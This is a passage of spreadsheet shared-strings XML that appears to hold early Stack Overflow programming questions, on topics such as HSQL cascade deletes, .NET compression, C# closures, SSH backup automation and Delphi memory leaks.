    <t xml:space="preserve">&lt;p&gt;I have two tables (renamed/refactored for illustrative purposes) with a Many-To-Many relationship in an HSQL database.  I want everything to be wiped out when I delete from one side of a Many-to-Many relationship (without querying the table; this is performance critical)&lt;/p&gt;
&lt;p&gt;Here are my main tables:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE PERSON
(
    PERSON_ID INTEGER GENERATED BY DEFAULT AS IDENTITY PRIMARY KEY, 
    NAME VARCHAR(50)
)
CREATE TABLE JOB
(
    JOB_ID INTEGER GENERATED BY DEFAULT AS IDENTITY PRIMARY KEY, 
    NAME VARCHAR(50)
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here is my join table:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;CREATE TABLE JOB_PERSON
(
    PERSON_ID INTEGER, 
    JOB_ID INTEGER
)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Here are my constraints:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;ALTER TABLE JOB_PERSON ADD 
    CONSTRAINT FK_PERSON_JOB FOREIGN KEY(PERSON_ID) 
    REFERENCES PERSON ON DELETE CASCADE ON UPDATE CASCADE 
ALTER TABLE JOB_PERSON ADD
    CONSTRAINT FK_JOB_PERSON FOREIGN KEY(JOB_ID) 
    REFERENCES JOB ON DELETE CASCADE ON UPDATE CASCADE
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I basically want to do this:  "delete from person where person_id=0" and have it delete everything from PERSON, JOB_PERSON and JOB if the JOB entity will be orphaned (no longer referenced in the many to many table)&lt;/p&gt;
&lt;p&gt;Is this possible without querying the database?  When I delete, it only deletes from PERSON and JOB_PERSON.  As you can probably tell, my sql skills are lacking.&lt;/p&gt;
&lt;p&gt;Here is the dummy data I have been playing around with:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;insert into person values(null,'Arthur');
insert into person values(null,'James');
insert into job values(null, 'Programmer')
insert into job values(null, 'Manager')
insert into job_person values(0,0);
insert into job_person values(0,1);
insert into job_person values(1,1);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So if I enter both of these statements:  &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;delete from person where person_id=0
delete from person where person_id=1
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I would like to have everything in all 3 tables deleted.  Possible?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>DTD Validation With Python?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering which of the built in python libraries, support DTD validation.&lt;/p&gt;
&lt;p&gt;I've been looking around and haven't been able to get a straight answer. I know ElementTree does NOT Support DTD validation.&lt;/p&gt;
&lt;p&gt;Which ones do?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to encrypt in VBScript using AES?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am looking to encrypt some data using &lt;a href="http://en.wikipedia.org/wiki/Advanced_Encryption_Standard"&gt;Rijndael/AES&lt;/a&gt; in &lt;a href="http://en.wikipedia.org/wiki/VBScript"&gt;VBScript&lt;/a&gt; using a specific key and &lt;a href="http://en.wikipedia.org/wiki/Initialization_vector"&gt;IV&lt;/a&gt; value. Are there any good function libraries or COM components that would be good to use?&lt;/p&gt;
&lt;p&gt;I looked at &lt;a href="http://en.wikipedia.org/wiki/CAPICOM"&gt;CAPICOM&lt;/a&gt;; it allows a passphrase only, and won't allow setting specific key and IV values.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is there step-by-step tutorial on setting up CruiseControl.NET?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What to do automatic nightly build of .NET web application and upload to the test server.  &lt;/p&gt;
&lt;p&gt;Or, if this tool is overkill, please suggest something else.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Special Characters in URL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're currently replacing all special characters and spaces in our URLs with hypens (-). From an SEO and readability point-of-view this works fine. However, in some cases, we are feeding parts of the URL into a search after stripping the hyphens out. The problem occurs when the search term &lt;em&gt;should&lt;/em&gt; have hyphens as it returns no results when they get stripped. We could modify the search algorithm we're using but this will slow it down (especially bad as we're using it with an AJAX-ed search box and this needs to be &lt;em&gt;fast&lt;/em&gt;). &lt;/p&gt;
&lt;p&gt;The best option to deal with this, as far as we can tell is to replace pre-existing hyphens with pipes (|). I have a feeling that this will have a negative impact on SEO for those terms as the pipe character will be treated as a part of the word and not as a separator. As far as I can tell, the &lt;em&gt;only&lt;/em&gt; characters that are considered to be separators are hyphens and forward slashes (/).&lt;/p&gt;
&lt;p&gt;So my questions are:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Are there alternative characters we can use to represent hyphens?&lt;/li&gt;
&lt;li&gt;If we can't use any other characters, how much impact will using a pipe character have on a search engine?&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Cheers,
Zac&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Is it better to have one UpdatePanel around multiple controls or separate UpdatePanels?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a web form that has multiple ListBoxes, TextBoxes, DropDowns.  If I put one UpdatePanel around the whole page, I noticed the page is slower.  Is this because, every control is being updated?  If I put different UpdatePanels around each control, I noticed the page has a better response.  Is it right to assume that this is because I have more control of which parts of the page are updated based on selections from ListBoxes and DropDowns for example?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;X&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Lists in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am an upper level Software Engineering student currently in a Data Structures and Algorithms class.  Our professor wants us to write a program using the List structure found in the C++ STL.  I have been trying to use C# more and more, and was wondering if the ArrayList structure in .NET is a good substitute for the STL List implementation. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What's the best way for a .NET Compact Framework executable to delete itself?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'd like my .NET Compact Framework app to delete itself after it finishes executing.  What's the best way to do this?&lt;/p&gt;
&lt;p&gt;On a Windows machine it's possible to do this using a .bat file, but that's not an option on mobile devices.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why does Hibernate/JDBC/MySQL drop connections after a day or so?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have several server processes that once in a while respond to messages from the clients and perform read-only transactions.&lt;/p&gt;
&lt;p&gt;After about a few days that the servers are running, they stop working correctly and when I check it turns out that there's a whole bunch of messages about the connection being closed.&lt;/p&gt;
&lt;p&gt;When I checked it out, it turned out that hibernate by default works in some sort of development mode where connections are dropped after a few hours, and I started using c3po for connection pooling. &lt;/p&gt;
&lt;p&gt;However, even with c3po, I get that problem about 24 hours or so after the servers are started.&lt;/p&gt;
&lt;p&gt;Has anyone encountered that problem and knows how to address it? I'm not familiar enough with the intricacies of configuring hibernate.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SharePoint searching external database</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;We're looking at doing a MOSS 2007 site which will have a fairly dynamic component (an external product catalog). The external produces will be stored in a database (not managed by SharePoint) and all interaction will occur via Web Parts.&lt;/p&gt;
&lt;p&gt;Is it possible to configure the SharePoint search to index the textual content &lt;em&gt;and&lt;/em&gt; the external database? Or can a custom search provider be written which is also used to query the external database?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>PageRequestManager is undefined</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am seeing this error intermittently.  My app throws PageRequestManager is undefined and so fails to load.  Oddly enough this only happens in firefox, ie loads fine.  Anyone know what this error means.  I've been working on the app for some time and I just started seeing this today.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Using Emacs to recursively find and replace in text files not already open</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As a follow-up to &lt;a href="http://stackoverflow.com/questions/269812/how-to-quickly-get-started-at-using-and-learning-emacs"&gt;this question&lt;/a&gt;, it's trying to find out how to do something like this which should be easy, that especially stops me from getting more used to using Emacs and instead starting up the editor I'm already familiar with. I use the example here fairly often in editing multiple files.&lt;/p&gt;
&lt;p&gt;In Ultraedit I'd do Alt+s then p to display a dialog box with the options: Find (includes using regular expressions across multiple lines), Replace with, In Files/Types, Directory, Match Case, Match Whole Word Only, List Changed Files and Search Sub Directories. Usually I'll first use the mouse to click-drag select the text that I want to replace.&lt;/p&gt;
&lt;p&gt;Using only Emacs itself (on Windows XP), without calling any external utility, how to replace all foo\nbar with bar\nbaz in &lt;code&gt;*.c&lt;/code&gt; and &lt;code&gt;*.h&lt;/code&gt; files in some folder and all folders beneath it. Maybe Emacs is not the best tool to do this with, but how can it be done easily with a minimal command?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MySQL C API using results</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using the MySQL C API to query the database and I have the results stored in MYSQL_ROW types.  I am able to print the results to the console with&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;printf("%s", row[0]);
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;however, according to the MySQL C API documentation, I cannot use them as null-terminated strings.&lt;/p&gt;
&lt;p&gt;At the bottom of &lt;a href="http://dev.mysql.com/doc/refman/5.0/en/c-api-function-overview.html" rel="nofollow"&gt;the function overview&lt;/a&gt;, they say I can "extract" the information with &lt;code&gt;mysql_store_result()&lt;/code&gt; or &lt;code&gt;mysql_use_result()&lt;/code&gt;.  However, I am still confused as to how this is done.&lt;/p&gt;
&lt;p&gt;Ideally, I want to use the results as a string so I can do stuff like &lt;code&gt;strcmp&lt;/code&gt;, but otherwise I definitely need to use the information somehow with those two functions.&lt;/p&gt;
&lt;p&gt;Can somebody show me an example of how to do this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>LinkedList remove method</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What is a doubly linked list's remove method?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Automate SSH without using public key authentication or expect(1)</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Is there a way to pass a password to ssh automatically. I would like to automatically ssh to a server &lt;b&gt;without&lt;/b&gt; using public key authentication or expect scripts, by somehow getting ssh to read the password from stdin or a file.&lt;/p&gt;
&lt;p&gt;The reason it has to be that way is that I would like to backup my files to a server using rsync/ssh running as a cron job. This server mounts my home directory &lt;i&gt;after&lt;/i&gt; it authenticates me, so using public key authentication does not work since ~/.ssh isn't available until after the login is successful. expect(1) is out of the question because I would like to run it as a cron job, and since cron jobs don't run under a terminal the combination of expect/ssh just doesn't work. I do not have root access to that server, and it would be difficult to get the admins to make any changes to the way things work there.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>jetty - reload tag file in jar</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have my main web project and a common project which houses my tag files. Currently I use jetty in exploded structure and I jar up my common project with my tag files and place into &lt;code&gt;web-inf/lib&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;When I make a change to my tag file, I can rejar and place into &lt;code&gt;web-inf/lib&lt;/code&gt; again, though jetty is failing.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;javax.servlet.ServletException: org.apache.jasper.JasperException: PWC6033: Unable to compile class for JSP
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How can I set up jetty so I can rejar my tag files without restarting the server?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Ruby on Rails plugin for showing line numbers in log for SQL queries</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anybody know any plugin, that can show line numbers for SQL queries in Rails logs? Something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;User Load (0.003154)   SELECT * FROM `users` WHERE (`users`.`id` = 1) - (user.rb, line 24)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Thanks!&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I make datagrid height is equal to data content in Adobe Flex</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;In adobe Flex datagrid height is equally to fix height . I want to make datagrid height is depend data . &lt;/p&gt;
</t>
  </si>
  <si>
    <t>What is the most useful type of java.awt.image.BufferedImage for off-screen rendering?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am creating a buffered image that is going to be a snapshot of a JComponent (via paint()) and rendered inside an &lt;a href="http://java.sun.com/j2se/1.5.0/docs/api/javax/swing/ImageIcon.html" rel="nofollow"&gt;ImageIcon&lt;/a&gt;.  There are a large amount of types in the &lt;a href="http://java.sun.com/j2se/1.5.0/docs/api/java/awt/image/BufferedImage.html#BufferedImage%28int,%20int,%20int%29" rel="nofollow"&gt;&lt;code&gt;BufferedImage(int width, int height, int imageType)&lt;/code&gt;&lt;/a&gt; constructor, but which one should I use?  &lt;/p&gt;
&lt;p&gt;I am sure that any of them would work, but which ones are better than the others?  How should I pick one? And Why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to configure CruiseControl.NET to build one project on a remote server</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a build server running CruiseControl.NET. It works well for the 7 projects that are configured to run on that server (let's call it server A).&lt;/p&gt;
&lt;p&gt;Now I have a new project that I wish to build on a different server (server B), but I want it to appear in the same ccnet dashboard as the existing projects. &lt;/p&gt;
&lt;p&gt;How do I configure CCNet for this scenario?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>GZipStream And DeflateStream will not decompress all bytes</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was in need of a way to compress images in .net so i looked into using the .net GZipStream class (or DeflateStream). However i found that decompression was not always successful, sometimes the images would decompress fine and other times i would get a GDI+ error that something is corrupted.&lt;/p&gt;
&lt;p&gt;After investigating the issue i found that the decompression was not giving back all the bytes it compressed. So if i compressed 2257974 bytes i would sometimes get back only 2257870 bytes (real numbers).&lt;/p&gt;
&lt;p&gt;The most funny thing is that sometimes it would work. So i created this little test method that compresses only 10 bytes and now i don't get back anything at all.&lt;/p&gt;
&lt;p&gt;I tried it with both compression classes GZipStream and DeflateStream and i double checked my code for possible errors. I even tried positioning the stream to 0 and flushing all the streams but with no luck.&lt;/p&gt;
&lt;p&gt;Here is my code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;    public static void TestCompression()
    {
        byte[] test = new byte[] { 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 };
        byte[] result = Decompress(Compress(test));
        // This will fail, result.Length is 0
        Debug.Assert(result.Length == test.Length);
    }
    public static byte[] Compress(byte[] data)
    {
        var compressedStream = new MemoryStream();
        var zipStream = new GZipStream(compressedStream, CompressionMode.Compress);
        zipStream.Write(data, 0, data.Length);
        return compressedStream.ToArray();
    }
    public static byte[] Decompress(byte[] data)
    {
        var compressedStream = new MemoryStream(data);
        var zipStream = new GZipStream(compressedStream, CompressionMode.Decompress);
        var resultStream = new MemoryStream();
        var buffer = new byte[4096];
        int read;
        while ((read = zipStream.Read(buffer, 0, buffer.Length)) &amp;gt; 0) {
            resultStream.Write(buffer, 0, read);
        }
        return resultStream.ToArray();
    }
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>Can Visual Studio 2008 Standard create a single EXE that does not require .NET framework?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;This is truly a beginner question, so I apologize in advance.&lt;/p&gt;
&lt;p&gt;I have Visual Studio 2008 Standard installed and would like to create a small Windows application that does NOT require any .NET framework when run on computers. Does VS 2008 Standard support such a feature? Any pointers on how to accomplish this would be fantastic.&lt;/p&gt;
&lt;p&gt;Thanks in advance.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to trigger rendering of JQuery treeview</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I use Jquery tree plugin (&lt;a href="http://docs.jquery.com/Plugins/Treeview" rel="nofollow"&gt;http://docs.jquery.com/Plugins/Treeview&lt;/a&gt;) to render hierarchical data. I have coded additional functions which would allow user to interact with this data (like adding/deleting nodes, swapping nodes, etc...)&lt;/p&gt;
&lt;p&gt;Currently this plugin supports that whenever you want to add any node, you can call following method,&lt;/p&gt;
&lt;p&gt;$("#browser").treeview({
     add: branches
});&lt;/p&gt;
&lt;p&gt;here "branches" is JQuery object created with the HTML block, which would represent a particular node.&lt;/p&gt;
&lt;p&gt;However, for delete and swapping of nodes, I use common JQuery functions like,&lt;/p&gt;
&lt;p&gt;for delete,
$("#topnd2").remove();&lt;/p&gt;
&lt;p&gt;for swapping,&lt;/p&gt;
&lt;p&gt;var next = $("#topnd2").next();
$("#topnd2").insertAfter(next);&lt;/p&gt;
&lt;p&gt;"topnd2" is an id of any particular tree node.&lt;/p&gt;
&lt;p&gt;The nodes get deleted / swapped properly but the problem is the tree does not get rendered and therefore the tree images (mainly vertical lines denoting branches) are not set properly.&lt;/p&gt;
&lt;p&gt;For example, if I delete the last node then that node will be removed from rendered treeview but the remaining sibling node should get L as branch line image but not | .&lt;/p&gt;
&lt;p&gt;I tried calling &lt;/p&gt;
&lt;p&gt;$("#browser").treeview(); &lt;/p&gt;
&lt;p&gt;Please let me know your ideas.&lt;/p&gt;
&lt;p&gt;Thanks,
Jatan&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Dynamic url for dojo combobox source</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to use a dojo combobox with an Ajax data source.  What I have is &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;div dojoType="dojo.data.ItemFileReadStore" 
     jsId="tags" 
     url="&amp;lt;%=ResolveClientUrl("~/Tag/TagMatches")%&amp;gt;" &amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;select dojoType="dijit.form.ComboBox" 
        store="tags" 
        value="" 
        name="tagName"&amp;gt;
&amp;lt;/select&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which does work except that I can't restrict the search set on the server side because I don't know how to change the url from which the data is pulled in order to specify a parameter.  Any hints? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Image loading icon for flash/flex?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;You often see those little 'petal' animations while an image or .swf file is loading in a Flash / Flex application.&lt;/p&gt;
&lt;p&gt;Do I have to steal this from someone or is there a standard one available from somewhere. i would think there is somethin standard because everyones looks the same!&lt;/p&gt;
&lt;p&gt;Ideally I want a flex Image control that displays such an icon when it is loading for more than 1/4 second.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>SVN - How to make an older revision the head revision?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;One of the files in my current head revision got corrupted. I want to make an older revision of that file the head revision as usually people sync to head revsion in my project. How to do that?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Captured variable in a loop in C#</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I met an interesting issue about C#. I have code like below.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;List&amp;lt;Func&amp;lt;int&amp;gt;&amp;gt; actions = new List&amp;lt;Func&amp;lt;int&amp;gt;&amp;gt;();
int variable = 0;
while (variable &amp;lt; 5)
{
    actions.Add(() =&amp;gt; variable * 2);
    ++ variable;
}
foreach (var act in actions)
{
    Console.WriteLine(act.Invoke());
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I expect it to output 0, 2, 4, 6, 8. However, it actually outputs five 10s.&lt;/p&gt;
&lt;p&gt;It seems that it is due to all actions referring to one captured variable. As a result, when they get invoked, they all have same output.&lt;/p&gt;
&lt;p&gt;Is there a way to work round this limit to have each action instance have its own captured variable?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>What should be included in a C# Programming Standard?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I've been tasked to write our department's C# Programming Standard (including guidelines).  What sort of standards/guidelines should I include?  I've already taken bits from various standards around the net (and pieces from Code Complete), but I'd like hear from developers in the field.&lt;/p&gt;
&lt;p&gt;I've already got:
Naming Conventions - General/Variables/Classes/Methods/Interfaces/Controls&lt;/p&gt;
&lt;p&gt;General Programming Practices - Documentation (comments etc), [WIP]&lt;/p&gt;
&lt;p&gt;OO Programming Practices - Encapsulation, [WIP]&lt;/p&gt;
&lt;p&gt;What else would be useful?  What shouldn't I include?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Automatic casting to string in C# and VB.NET</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I could do this in C#..&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;int number = 2;
string str = "Hello " + number + " world";
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;..and str ends up as "Hello 2 world".&lt;/p&gt;
&lt;p&gt;In VB.NET i could do this..&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Dim number As Integer = 2
Dim str As String = "Hello " + number + " world"
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;..but I get an InvalidCastException "Conversion from string "Hello " to type 'Double' is not valid."&lt;/p&gt;
&lt;p&gt;I am aware that I should use .ToString() in both cases, but whats going on here with the code as it is?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Cross-references and garbage collection</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;There is an application with an extensive object graph. This graph mainly consists of a set of subgraphs which are connected to the rest of the graph through the only reference. But internally each such subgraph has some number of cross-references among objects. Once in a while such a sub graph needs to be thrown away. Would it be enough just to set to null the only referece which points to that subgraph to make it eligible for garbage collection?&lt;/p&gt;
&lt;p&gt;My concern is that internal cross-references may "protect" the entire subgraph from garbage collection. In other words, is the garbage collector wise enough to figure out that all references in a subgraph do not leave the boundaries of the subgraph and therefore entire subgraph can be purged.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Firefox 3 doesn't allow 'Back' to a form if the form result in a redirect last time</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Greetings,&lt;/p&gt;
&lt;p&gt;Here's the problem I'm having.  I have a page which redirects directly to another page the first time it is visited.  If the user clicks 'back', though, the page behaves differently and instead displays content (tracking session IDs to make sure this is the second time the page has been loaded).  To do this, I tell the user's browser to disable caching for the relevant page. &lt;/p&gt;
&lt;p&gt;This works well in IE7, but Firefox 3 won't let me click 'back' to a page that resulted in a redirect.  I assume it does this to prevent the typical back--&gt;redirect again loop that frustrates so many users.  Any ideas for how I may override this behavior?&lt;/p&gt;
&lt;p&gt;Alexey&lt;/p&gt;
&lt;p&gt;EDIT: The page which we redirect to is an external site over which we have no control.  Server-side redirects won't work because this wouldn't generate a 'back' button for in the browser.  &lt;/p&gt;
&lt;p&gt;To quote:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Some people in the thread are talking about server-side redirect, and redirect headers (same thing)... keep in mind that we need client-side redirection which can be done in two ways:&lt;/p&gt;
  &lt;p&gt;a) A META header - Not recommended, and has some problems
  b) Javascript, which can be done in at least three ways ("location", "location.href" and "location.replace()")&lt;/p&gt;
  &lt;p&gt;The server side redirect won't and shouldn't activate the back button, and can't display the typical "You'll be redirected now" page... so it's no good (it's what we're doing at the moment, actually.. where you're immediately redirected to the "lucky" page).&lt;/p&gt;
&lt;/blockquote&gt;
</t>
  </si>
  <si>
    <t>WIX: How can the registry key be changed based on the OS on which the installer is running?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I want to set registry keys in following way&lt;/p&gt;
&lt;p&gt;if OS is Vista then
   HKLM\MyKey1\MyValue=1 
else 
   HKLM\MyKey2\MyValue=1&lt;/p&gt;
&lt;p&gt;I know how to set Registry keys in WIX but it seems the condition cannot be set on  element. &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Strategy for Offline/Online data synchronization</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;My requirement is I have server J2EE web application and client J2EE web application. Sometimes client can go offline. When client comes online he should be able to synchronize changes to and fro. Also I should be able to control which rows/tables need to be synchronized based on some filters/rules. Is there any existing Java frameworks for doing it? If I need to implement on my own, what are the different strategies that you can suggest?&lt;/p&gt;
&lt;p&gt;One solution in my mind is maintaining sql logs and executing same statements at other side during synchronization. Do you see any problems with this strategy?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C# in linux environment</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am currently working in C/C++ in a Unix environment and am new to Linux environments. I would like to learn about the Linux OS and learn C# as the next level of programming language for my career.&lt;/p&gt;
&lt;p&gt;I decided to put Ubuntu Linux on my laptop. But I am not sure whether we can write, compile and run C# programs in Linux environments or not.&lt;/p&gt;
&lt;p&gt;The only IDE I know for C# is MS Visual Studio. Is there are any possible way to work in C# in a Linux environment?&lt;/p&gt;
&lt;p&gt;If I have no other option, I'll have both operating systems on my laptop - Vista to learn C# and Linux for the other OS.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>JBoss AS / Wildfly community version corresponding to Red Hat EAP version?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;As far as i know the EAP editions of JBoss Application Server (AS) are just a bunch of community edition JBoss projects with some sugar.&lt;/p&gt;
&lt;p&gt;So, what is the &lt;strong&gt;community edition&lt;/strong&gt; of the JBoss Application Server that &lt;strong&gt;JBoss EAP 4.3.0&lt;/strong&gt; corresponds to?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Collection&lt;T&gt; versus List&lt;T&gt; what should you use on your interfaces?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;The code looks like below:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;namespace Test
{
    public interface IMyClass
    {
        List&amp;lt;IMyClass&amp;gt; GetList();
    }
    public class MyClass : IMyClass
    {
        public List&amp;lt;IMyClass&amp;gt; GetList()
        {
            return new List&amp;lt;IMyClass&amp;gt;();
        }
    }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;When I Run Code Analysis i get the following recommendation.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;Warning    3   CA1002 : Microsoft.Design : Change 'List' in 'IMyClass.GetList()' to use Collection, ReadOnlyCollection or KeyedCollection&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;How should I fix this and what is good practice here?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to select maximum 3 items per users in MySQL?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I run a website where users can post items (e.g. pictures). The items are stored in a MySQL database. &lt;/p&gt;
&lt;p&gt;I want to query for the last ten posted items BUT with the constraint of a maximum of 3 items can come from any single user. &lt;/p&gt;
&lt;p&gt;What is the best way of doing it? My preferred solution is a constraint that is put on the SQL query requesting the last ten items. But ideas on how to set up the database design is very welcome.&lt;/p&gt;
&lt;p&gt;Thanks in advance!&lt;/p&gt;
&lt;p&gt;BR&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Java: Determine receiving address when receiving with MulticastSocket</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am using MulticastSocket to receive UDP Multicast packets. How can I determine to which address such a packet was sent? With the methods provided, I am only able to determine the sender address.&lt;/p&gt;
&lt;p&gt;Of course, I am the one who sets the To-Address when creating the listening socket, but can I really be sure about this? What about broadcast packets? What about packets that somehow end up here?
I really want to distinguish if the packet was REALLY multicast.&lt;/p&gt;
&lt;p&gt;Thank you!&lt;/p&gt;
&lt;p&gt;Update: Currently it seems like unicast packets just sent to that port also end up in the multicast sockets receive() :( Binding to devices also gives me no better results&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How to track down tricky memory leak with fastMM?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;After upgrading a project from Delphi 2007 to Delphi 2009 I'm getting an Unknown memory leak, so far I've been tryin to track it down using fastMM, here is what fastMM stack trace reports:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;A memory block has been leaked. The size is: 20
This block was allocated by thread 0x111C, and the stack trace (return addresses) 
  at the time was:
40339E [System.pas][System][@GetMem][3412] 534873 [crtl][_malloc]
56D1C4 [canex.cpp][MidasLib][DllGetDataSnapClassObject][3918]
56D316 [canex.cpp][MidasLib][DllGetDataSnapClassObject][3961]
56D5EE [canex.cpp][MidasLib][DllGetDataSnapClassObject][4085]
562D48 [DBCommon.pas][DBCommon][TFilterExpr.PutExprNode][1583]
408E46 [System.pas][System][DynArraySetLength][20464]
56D5EE [canex.cpp][MidasLib][DllGetDataSnapClassObject][4085]
408E92 [System.pas][System][@DynArraySetLength][20486]
528C1B [Forms.pas][Forms][TCustomForm.DoCreate][3260]
171A1A [GetRawStackTrace]
The block is currently used for an object of class: Unknown
The allocation number is: 302844
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And sometimes I get this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;A memory block has been leaked. The size is: 20
This block was allocated by thread 0x111C, and the stack trace (return addresses) 
  at the time was:
40339E [System.pas][System][@GetMem][3412]
534873 [crtl][_malloc]
56D1C4 [canex.cpp][MidasLib][DllGetDataSnapClassObject][3918]
56D316 [canex.cpp][MidasLib][DllGetDataSnapClassObject][3961]
77DC921A [RtlAnsiStringToUnicodeString]
56D5EE [canex.cpp][MidasLib][DllGetDataSnapClassObject][4085]
7726B8F5 [GetProcAddress]
7726B907 [GetProcAddress]
589B1E [ossrv.cpp][MidasLib][DllGetDataSnapClassObject][3163]
56D5EE [canex.cpp][MidasLib][DllGetDataSnapClassObject][4085]
408E92 [System.pas][System][@DynArraySetLength][20486]
The block is currently used for an object of class: Unknown
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is there some better way to figure out what really is causing the Memory leak?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Enabling controls at moment of opening a form in Access</t>
  </si>
  <si>
